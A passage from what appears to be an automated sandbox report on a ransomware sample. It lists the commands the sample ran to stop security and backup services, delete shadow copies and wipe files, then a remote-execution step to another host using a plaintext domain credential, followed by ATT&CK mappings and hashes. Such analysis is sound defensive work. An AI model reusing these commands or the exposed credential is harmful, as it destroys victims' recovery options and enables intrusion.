  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:3648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5516
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:4888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:4748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5824
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:5952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:4744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:4812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:5604
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5716
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:5408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:4928
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:5644
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5900
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5252
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4608
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5036
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5296
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4276
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5196
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5140
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4828
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6028
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4020
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4416
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3016
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:780
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4904
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5608
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2108
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5824
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4356
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.53 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:5852
- C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe
  "C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe" \10.10.0.53 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
  2⤵
  - Executes dropped EXE
  PID:4404
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4692
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:4436
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1260
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5060
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
  2⤵
  PID:1540
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:408

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
78b0f852e77263420ec0b337836cbfa1

SHA1
72fc942fe2ace153a516e9d5605a81015e63e45d

SHA256
ea07953a673620666e39dcd258c2e11978e663d7c575eb392957e887027bd0c1

SHA512
2f5653bd2a2794cd8a2ee97d6964464db2c7b9fd2f3ec3d7fea36685c33a62d185762e1b84298f622e3ebcde53608581205f30a8ad8a5b304b1d3b7d7ef59b31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
2a694ac72df5fb8dafec4837fda13db7

SHA1
c29e7536d91425adc54f42d23b45e6b0766c2ede

SHA256
40cab2e3216c87692d92013de4887364edc2ea4cf92b44ba82bab6d9f02a3756

SHA512
885528f7f3711c998acd13bb6373c21ab399c7fa99f6f63b4070ca1313cf1088db0aea759344648a322ee6d23b912ec6fc8873447bd4e201690480f82d291ec2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
2a694ac72df5fb8dafec4837fda13db7

SHA1
c29e7536d91425adc54f42d23b45e6b0766c2ede

SHA256
40cab2e3216c87692d92013de4887364edc2ea4cf92b44ba82bab6d9f02a3756

SHA512
885528f7f3711c998acd13bb6373c21ab399c7fa99f6f63b4070ca1313cf1088db0aea759344648a322ee6d23b912ec6fc8873447bd4e201690480f82d291ec2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ec7b0b3d892c4f7d0382a031c094653f

SHA1
a6ffd1ac5d895be20c21eb8f7becf2bd4bf99781

SHA256
ff816e258056691ffa9a9aca2e9a6c0569c8bf5cad8860981624f0648d7ce6ea

SHA512
f5eb1d6b405e583634b85dd16a6d52641317ed801b99dcd7bb3f4caf2a790fbd41cfc9eda801d056100c6d23887af0057a9f47a1444ac8bf2b571d7ebf79086b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f0c0e33cb8c314d9273b0671c8ef2a1e

SHA1
e60be3364e7f3313d92deadfc4f77cfb8fc07094

SHA256
d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d

SHA512
4176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f0c0e33cb8c314d9273b0671c8ef2a1e

SHA1
e60be3364e7f3313d92deadfc4f77cfb8fc07094

SHA256
d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d

SHA512
4176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f0c0e33cb8c314d9273b0671c8ef2a1e

SHA1
e60be3364e7f3313d92deadfc4f77cfb8fc07094

SHA256
d341a00e058975140d07946f2aa41c55a2f1ca0c7002ec8c8552e8991ac3eb3d

SHA512
4176127fe50225587c2a4472facff18282ab8c7953a4089a4c25a11d367f66d274347fa1084311c2226e71378c3ac2a9039ced1a4471832792445ed29ccf32a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
14d33a7bdcf61d5d6d29e744daa969e7

SHA1
50de301bb0db9abc8cf830c8af9d54d13884dbc7

SHA256
db6876ed6288f86294c98f2a6802e5229b49ed043f7764071533472e30c403f9

SHA512
7f03211671e4823e222e696c9f3ca6301ebcdf35add5c93310178e9e35b306adf50f93208332b1f91bcb1f0eb8a4186597682db22090c7fbeb12491d15b46120

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d844a33ea222cd63d3df2bd74ddf742b

SHA1
5d8b7e0a96c86430507ac41d821248d95edf4a52

SHA256
297929e0b761983531a2cfaea05b0c08a7b384d14ef653d984203db920c49295

SHA512
262c94ce0bb2449f9f254800aa27958ea2d25b6b4c2aab946460d6fdb647e207f3009a3773e1d6ee98c00b0fbf29893fd965d0e685f9f7a3429a39db4c3b635b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d844a33ea222cd63d3df2bd74ddf742b

SHA1
5d8b7e0a96c86430507ac41d821248d95edf4a52

SHA256
297929e0b761983531a2cfaea05b0c08a7b384d14ef653d984203db920c49295

SHA512
262c94ce0bb2449f9f254800aa27958ea2d25b6b4c2aab946460d6fdb647e207f3009a3773e1d6ee98c00b0fbf29893fd965d0e685f9f7a3429a39db4c3b635b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
9b5a481f11ce24973ed9532b1bbcc394

SHA1
973732339705552f1af4dc6d8f09feed902f3b65

SHA256
3ca19e516fda9f9c04097921d27a5856fae0538ca1ebf11efc4c7b2c44208113

SHA512
683395ba58ed0d28a2a2f6ab8f24783d9be0d78c3106bd4e6e512e355aa2efaac28ce8c7adbdffa726199e3c6b4aa47e453552bd8a8139bb3a6c58eb2491e045

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ec42421720f415adecf3c598c4287a10

SHA1
9c0ce8ee98768b6272642997bc862b772d0cd18b

SHA256
be7d6217b57989fa13fa3c523b695e9d52066171c49a0ace27106aecddf50e99

SHA512
49b4dfe123cf767f207cbbe6c9d27797424b64840a650a2841420ca899b9fb39ea31fec7bfa96b0588e3b4b76ae2383773fada18f9d12410785d867a7d6ccbc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe

MD5
a8283f82f258a5577fe39fe24650a880

SHA1
1fb0e4efaf0ee0dabc525ff37059a76486311642

SHA256
1398d653106a68e31dbb1da06141a1809a65e92a45f021edf6be220265957225

SHA512
6ce8f9f0c9cf8b611528947d8d81f5c870d6f5ecc2a7dab33af782aa092c530ff97736f5122b3b2e802fd5f19880f05597e83965bca3e64bbaad0f96e9da80ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\c3eokz5t.exe

MD5
a8283f82f258a5577fe39fe24650a880

SHA1
1fb0e4efaf0ee0dabc525ff37059a76486311642

SHA256
1398d653106a68e31dbb1da06141a1809a65e92a45f021edf6be220265957225

SHA512
6ce8f9f0c9cf8b611528947d8d81f5c870d6f5ecc2a7dab33af782aa092c530ff97736f5122b3b2e802fd5f19880f05597e83965bca3e64bbaad0f96e9da80ff

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5
85a366844a7a429001660821c6808956

SHA1
1f3764bc3ea18130a0abea6c18a8d6fc120a4908

SHA256
11514502268414441de6f91983452014c683aca6b4c3a24b29777a81b59f854a

SHA512
56644b06bc6abdc95b5b560004893ffd6807025198f6e1e7b0cd3fa02374189a0e85a4e4836b422cd674613c346d37b00fbfbcaf252a2bd82fcaac04151dd656

Download Submit
memory/196-161-0x0000000000000000-mapping.dmp

Download
memory/780-155-0x0000000000000000-mapping.dmp

Download
memory/1260-168-0x0000000000000000-mapping.dmp

Download
memory/1336-4-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/1336-6-0x0000021BC9890000-0x0000021BC9891000-memory.dmp

Filesize
4KB

Download
memory/1336-5-0x0000021BAF210000-0x0000021BAF211000-memory.dmp

Filesize
4KB

Download
memory/1336-3-0x0000000000000000-mapping.dmp

Download
memory/1540-169-0x0000000000000000-mapping.dmp

Download
memory/1716-21-0x0000000000000000-mapping.dmp

Download
memory/1716-28-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/1720-24-0x0000000000000000-mapping.dmp

Download
memory/1720-32-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/1800-16-0x0000000000000000-mapping.dmp

Download
memory/1800-23-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/2108-158-0x0000000000000000-mapping.dmp

Download
memory/2304-10-0x0000000000000000-mapping.dmp

Download
memory/2304-17-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/2372-57-0x0000000000000000-mapping.dmp

Download
memory/2452-118-0x0000000000000000-mapping.dmp

Download
memory/2784-7-0x0000000000000000-mapping.dmp

Download
memory/2784-12-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/3016-154-0x0000000000000000-mapping.dmp

Download
memory/3016-8-0x0000000000000000-mapping.dmp

Download
memory/3016-13-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/3520-18-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/3520-14-0x0000000000000000-mapping.dmp

Download
memory/3596-19-0x0000000000000000-mapping.dmp

Download
memory/3596-25-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/3648-60-0x0000000000000000-mapping.dmp

Download
memory/3708-15-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/3708-9-0x0000000000000000-mapping.dmp

Download
memory/3888-1-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/3888-0-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/4020-152-0x0000000000000000-mapping.dmp

Download
memory/4108-66-0x0000000000000000-mapping.dmp

Download
memory/4140-36-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-27-0x0000000000000000-mapping.dmp

Download
memory/4148-58-0x0000000000000000-mapping.dmp

Download
memory/4148-124-0x0000000000000000-mapping.dmp

Download
memory/4252-42-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/4252-30-0x0000000000000000-mapping.dmp

Download
memory/4276-59-0x0000000000000000-mapping.dmp

Download
memory/4276-145-0x0000000000000000-mapping.dmp

Download
memory/4352-33-0x0000000000000000-mapping.dmp

Download
memory/4352-47-0x00007FF8C3870000-0x00007FF8C425C000-memory.dmp

Filesize
9.9MB

Download
memory/4356-160-0x0000000000000000-mapping.dmp

Download
memory/4404-163-0x0000000000000000-mapping.dmp

Download
memory/4416-153-0x0000000000000000-mapping.dmp

Download
memory/4436-167-0x0000000000000000-mapping.dmp

Download
memory/4464-37-0x0000000000000000-mapping.dmp

Download
memory/4468-128-0x0000000000000000-mapping.dmp

Download
memory/4484-38-0x0000000000000000-mapping.dmp

Download
memory/4492-61-0x0000000000000000-mapping.dmp

Download
memory/4512-39-0x0000000000000000-mapping.dmp

Download
memory/4524-171-0x0000000000000000-mapping.dmp

Download
memory/4584-41-0x0000000000000000-mapping.dmp

Download
memory/4608-136-0x0000000000000000-mapping.dmp

Download
memory/4632-43-0x0000000000000000-mapping.dmp

Download
memory/4656-62-0x0000000000000000-mapping.dmp

Download
memory/4660-44-0x0000000000000000-mapping.dmp

Download
memory/4692-165-0x0000000000000000-mapping.dmp

Download
memory/4740-46-0x0000000000000000-mapping.dmp

Download
memory/4744-132-0x0000000000000000-mapping.dmp

Download
memory/4748-65-0x0000000000000000-mapping.dmp

Download
memory/4800-143-0x0000000000000000-mapping.dmp

Download
memory/4800-48-0x0000000000000000-mapping.dmp

Download
memory/4812-137-0x0000000000000000-mapping.dmp

Download
memory/4828-150-0x0000000000000000-mapping.dmp

Download
memory/4836-49-0x0000000000000000-mapping.dmp

Download
memory/4872-50-0x0000000000000000-mapping.dmp

Download
memory/4872-138-0x0000000000000000-mapping.dmp

Download
memory/4880-139-0x0000000000000000-mapping.dmp

Download
memory/4888-63-0x0000000000000000-mapping.dmp

Download
memory/4904-156-0x0000000000000000-mapping.dmp

Download
memory/4928-149-0x0000000000000000-mapping.dmp

Download
memory/4948-51-0x0000000000000000-mapping.dmp

Download
memory/4968-52-0x0000000000000000-mapping.dmp

Download
memory/5008-53-0x0000000000000000-mapping.dmp

Download
memory/5036-140-0x0000000000000000-mapping.dmp

Download
memory/5036-55-0x0000000000000000-mapping.dmp

Download
memory/5060-170-0x0000000000000000-mapping.dmp

Download
memory/5140-148-0x0000000000000000-mapping.dmp

Download
memory/5148-125-0x0000000000000000-mapping.dmp

Download
memory/5148-68-0x0000000000000000-mapping.dmp

Download
memory/5160-69-0x0000000000000000-mapping.dmp

Download
memory/5164-127-0x0000000000000000-mapping.dmp

Download
memory/5196-146-0x0000000000000000-mapping.dmp

Download
memory/5208-70-0x0000000000000000-mapping.dmp

Download
memory/5220-71-0x0000000000000000-mapping.dmp

Download
memory/5252-135-0x0000000000000000-mapping.dmp

Download
memory/5260-72-0x0000000000000000-mapping.dmp

Download
memory/5296-141-0x0000000000000000-mapping.dmp

Download
memory/5324-73-0x0000000000000000-mapping.dmp

Download
memory/5336-74-0x0000000000000000-mapping.dmp

Download
memory/5348-75-0x0000000000000000-mapping.dmp

Download
memory/5348-122-0x0000000000000000-mapping.dmp

Download
memory/5384-106-0x0000000000000000-mapping.dmp

Download
memory/5408-147-0x0000000000000000-mapping.dmp

Download
memory/5408-77-0x0000000000000000-mapping.dmp

Download
memory/5460-78-0x0000000000000000-mapping.dmp

Download
memory/5464-123-0x0000000000000000-mapping.dmp

Download
memory/5484-79-0x0000000000000000-mapping.dmp

Download
memory/5516-82-0x0000000000000000-mapping.dmp

Download
memory/5544-81-0x0000000000000000-mapping.dmp

Download
memory/5604-142-0x0000000000000000-mapping.dmp

Download
memory/5608-157-0x0000000000000000-mapping.dmp

Download
memory/5624-121-0x0000000000000000-mapping.dmp

Download
memory/5644-131-0x0000000000000000-mapping.dmp

Download
memory/5676-120-0x0000000000000000-mapping.dmp

Download
memory/5684-85-0x0000000000000000-mapping.dmp

Download
memory/5696-86-0x0000000000000000-mapping.dmp

Download
memory/5716-144-0x0000000000000000-mapping.dmp

Download
memory/5732-119-0x0000000000000000-mapping.dmp

Download
memory/5748-87-0x0000000000000000-mapping.dmp

Download
memory/5760-88-0x0000000000000000-mapping.dmp

Download
memory/5788-89-0x0000000000000000-mapping.dmp

Download
memory/5824-90-0x0000000000000000-mapping.dmp

Download
memory/5824-159-0x0000000000000000-mapping.dmp

Download
memory/5852-162-0x0000000000000000-mapping.dmp

Download
memory/5856-92-0x0000000000000000-mapping.dmp

Download
memory/5864-105-0x0000000000000000-mapping.dmp

Download
memory/5884-134-0x0000000000000000-mapping.dmp

Download
memory/5900-133-0x0000000000000000-mapping.dmp

Download
memory/5904-93-0x0000000000000000-mapping.dmp

Download
memory/5952-129-0x0000000000000000-mapping.dmp

Download
memory/5952-95-0x0000000000000000-mapping.dmp

Download
